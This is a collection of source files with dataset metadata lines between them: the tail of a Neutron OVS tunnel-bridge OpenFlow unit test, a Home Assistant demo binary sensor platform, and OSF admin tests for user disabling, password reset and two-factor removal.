n_bits=32,
src=('in_port', 0)),
],
table_id=20),
ofpp.OFPActionOutput(patch_int_ofport, 0),
]),
],
match=ofpp.OFPMatch(),
priority=1,
table_id=10)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(),
priority=0,
table_id=20)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(),
priority=0,
table_id=21)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0,
table_id=22))
]
self.assertEqual(expected, self.mock.mock_calls)
def test_provision_local_vlan(self):
network_type = 'vxlan'
lvid = 888
segmentation_id = 777
distributed = False
self.br.provision_local_vlan(network_type=network_type, lvid=lvid,
segmentation_id=segmentation_id,
distributed=distributed)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionPushVlan(),
ofpp.OFPActionSetField(
vlan_vid=lvid | ofp.OFPVID_PRESENT)
]),
ofpp.OFPInstructionGotoTable(table_id=10),
],
match=ofpp.OFPMatch(tunnel_id=segmentation_id),
priority=1,
table_id=4)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_reclaim_local_vlan(self):
network_type = 'vxlan'
segmentation_id = 777
self.br.reclaim_local_vlan(network_type=network_type,
segmentation_id=segmentation_id)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(
table_id=4,
match=ofpp.OFPMatch(tunnel_id=segmentation_id)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_install_flood_to_tun(self):
vlan = 3333
tun_id = 2222
ports = [11, 44, 22, 33]
self.br.install_flood_to_tun(vlan=vlan,
tun_id=tun_id,
ports=ports)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionPopVlan(),
ofpp.OFPActionSetField(tunnel_id=tun_id),
] + [ofpp.OFPActionOutput(p, 0) for p in ports]),
],
match=ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT),
priority=1,
table_id=22)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_flood_to_tun(self):
vlan = 3333
self.br.delete_flood_to_tun(vlan=vlan)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(table_id=22,
match=ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_install_unicast_to_tun(self):
vlan = 3333
port = 55
mac = '08:60:6e:7f:74:e7'
tun_id = 2222
self.br.install_unicast_to_tun(vlan=vlan,
tun_id=tun_id,
port=port,
mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionPopVlan(),
ofpp.OFPActionSetField(tunnel_id=tun_id),
ofpp.OFPActionOutput(port, 0),
]),
],
match=ofpp.OFPMatch(
eth_dst=mac, vlan_vid=vlan | ofp.OFPVID_PRESENT),
priority=2,
table_id=20)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_unicast_to_tun(self):
vlan = 3333
mac = '08:60:6e:7f:74:e7'
self.br.delete_unicast_to_tun(vlan=vlan, mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(table_id=20,
match=ofpp.OFPMatch(
eth_dst=mac, vlan_vid=vlan | ofp.OFPVID_PRESENT)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_unicast_to_tun_without_mac(self):
vlan = 3333
mac = None
self.br.delete_unicast_to_tun(vlan=vlan, mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(table_id=20,
match=ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_install_arp_responder(self):
vlan = 3333
ip = '192.0.2.1'
mac = '08:60:6e:7f:74:e7'
self.br.install_arp_responder(vlan=vlan, ip=ip, mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionSetField(arp_op=self.arp.ARP_REPLY),
ofpp.NXActionRegMove(
dst_field='arp_tha',
n_bits=48,
src_field='arp_sha'),
ofpp.NXActionRegMove(
dst_field='arp_tpa',
n_bits=32,
src_field='arp_spa'),
ofpp.OFPActionSetField(arp_sha=mac),
ofpp.OFPActionSetField(arp_spa=ip),
ofpp.OFPActionOutput(ofp.OFPP_IN_PORT, 0),
]),
],
match=ofpp.OFPMatch(
eth_type=self.ether_types.ETH_TYPE_ARP,
arp_tpa=ip,
vlan_vid=vlan | ofp.OFPVID_PRESENT),
priority=1,
table_id=21)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_arp_responder(self):
vlan = 3333
ip = '192.0.2.1'
self.br.delete_arp_responder(vlan=vlan, ip=ip)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(
match=ofpp.OFPMatch(
eth_type=self.ether_types.ETH_TYPE_ARP,
arp_tpa=ip,
vlan_vid=vlan | ofp.OFPVID_PRESENT),
table_id=21),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_delete_arp_responder_without_ip(self):
vlan = 3333
ip = None
self.br.delete_arp_responder(vlan=vlan, ip=ip)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(
match=ofpp.OFPMatch(
eth_type=self.ether_types.ETH_TYPE_ARP,
vlan_vid=vlan | ofp.OFPVID_PRESENT),
table_id=21),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_setup_tunnel_port(self):
network_type = 'vxlan'
port = 11111
self.br.setup_tunnel_port(network_type=network_type, port=port)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionGotoTable(table_id=4),
],
match=ofpp.OFPMatch(in_port=port),
priority=1,
table_id=0)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_cleanup_tunnel_port(self):
port = 11111
self.br.cleanup_tunnel_port(port=port)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(in_port=port),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_add_dvr_mac_tun(self):
mac = '00:02:b3:13:fe:3d'
port = 8888
self.br.add_dvr_mac_tun(mac=mac, port=port)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionOutput(port, 0),
]),
],
match=ofpp.OFPMatch(eth_src=mac),
priority=1,
table_id=9)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_remove_dvr_mac_tun(self):
mac = '00:02:b3:13:fe:3d'
self.br.remove_dvr_mac_tun(mac=mac)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(eth_src=mac, table_id=9),
]
self.assertEqual(expected, self.mock.mock_calls)
| apache-2.0 | -28,277,967,848,881,816 | 38.652893 | 79 | 0.458524 | false |
keerts/home-assistant | homeassistant/components/binary_sensor/demo.py | 10 | 1257 | """
Demo platform that has two fake binary sensors.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
from homeassistant.components.binary_sensor import BinarySensorDevice
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Demo binary sensor platform."""
add_devices([
DemoBinarySensor('Basement Floor Wet', False, 'moisture'),
DemoBinarySensor('Movement Backyard', True, 'motion'),
])
class DemoBinarySensor(BinarySensorDevice):
"""A Demo binary sensor."""
def __init__(self, name, state, device_class):
"""Initialize the demo sensor."""
self._name = name
self._state = state
self._sensor_type = device_class
@property
def device_class(self):
"""Return the class of this sensor."""
return self._sensor_type
@property
def should_poll(self):
"""No polling needed for a demo binary sensor."""
return False
@property
def name(self):
"""Return the name of the binary sensor."""
return self._name
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
| apache-2.0 | -4,975,289,294,281,543,000 | 26.933333 | 71 | 0.644391 | false |
kch8qx/osf.io | admin_tests/users/test_views.py | 6 | 4123 | from django.test import RequestFactory
from nose import tools as nt
import mock
from tests.base import AdminTestCase
from website import settings
from framework.auth import User
from tests.factories import UserFactory, AuthUserFactory
from admin_tests.utilities import setup_view, setup_log_view
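# setup_view / setup_log_view (admin_tests.utilities) bind a RequestFactory
# request and the URL kwargs to a view instance so it can be exercised without
# going through Django's URL routing.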
from admin.users.views import (
UserView,
ResetPasswordView,
User2FactorDeleteView,
UserDeleteView,
)
from admin.common_auth.logs import OSFLogEntry
class TestUserView(AdminTestCase):
def test_no_guid(self):
request = RequestFactory().get('/fake_path')
view = UserView()
view = setup_view(view, request)
with nt.assert_raises(AttributeError):
view.get_object()
def test_load_data(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = UserView()
view = setup_view(view, request, guid=guid)
res = view.get_object()
nt.assert_is_instance(res, dict)
def test_name_data(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = UserView()
view = setup_view(view, request, guid=guid)
temp_object = view.get_object()
view.object = temp_object
res = view.get_context_data()
nt.assert_equal(res[UserView.context_object_name], temp_object)
class TestResetPasswordView(AdminTestCase):
def test_reset_password_context(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = ResetPasswordView()
view = setup_view(view, request, guid=guid)
res = view.get_context_data()
nt.assert_is_instance(res, dict)
nt.assert_in((user.emails[0], user.emails[0]), view.initial['emails'])
class TestDisableUser(AdminTestCase):
def setUp(self):
self.user = UserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = UserDeleteView()
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
def test_get_object(self):
obj = self.view.get_object()
nt.assert_is_instance(obj, User)
def test_get_context(self):
res = self.view.get_context_data(object=self.user)
nt.assert_in('guid', res)
nt.assert_equal(res.get('guid'), self.user._id)
def test_disable_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
count = OSFLogEntry.objects.count()
self.view.delete(self.request)
self.user.reload()
nt.assert_true(self.user.is_disabled)
nt.assert_equal(OSFLogEntry.objects.count(), count + 1)
def test_reactivate_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
self.view.delete(self.request)
count = OSFLogEntry.objects.count()
self.view.delete(self.request)
self.user.reload()
nt.assert_false(self.user.is_disabled)
nt.assert_equal(OSFLogEntry.objects.count(), count + 1)
class TestRemove2Factor(AdminTestCase):
def setUp(self):
super(TestRemove2Factor, self).setUp()
self.user = AuthUserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = User2FactorDeleteView()
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
@mock.patch('admin.users.views.User.delete_addon')
def test_remove_two_factor_get(self, mock_delete_addon):
self.view.delete(self.request)
mock_delete_addon.assert_called_with('twofactor')
def test_integration_delete_two_factor(self):
user_addon = self.user.get_or_add_addon('twofactor')
nt.assert_not_equal(user_addon, None)
user_settings = self.user.get_addon('twofactor')
nt.assert_not_equal(user_settings, None)
count = OSFLogEntry.objects.count()
self.view.delete(self.request)
post_addon = self.user.get_addon('twofactor')
nt.assert_equal(post_addon, None)
nt.assert_equal(OSFLogEntry.objects.count(), count + 1)
| apache-2.0 | 7,104,416,714,735,291,000 | 33.940678 | 79 | 0.650012 | false |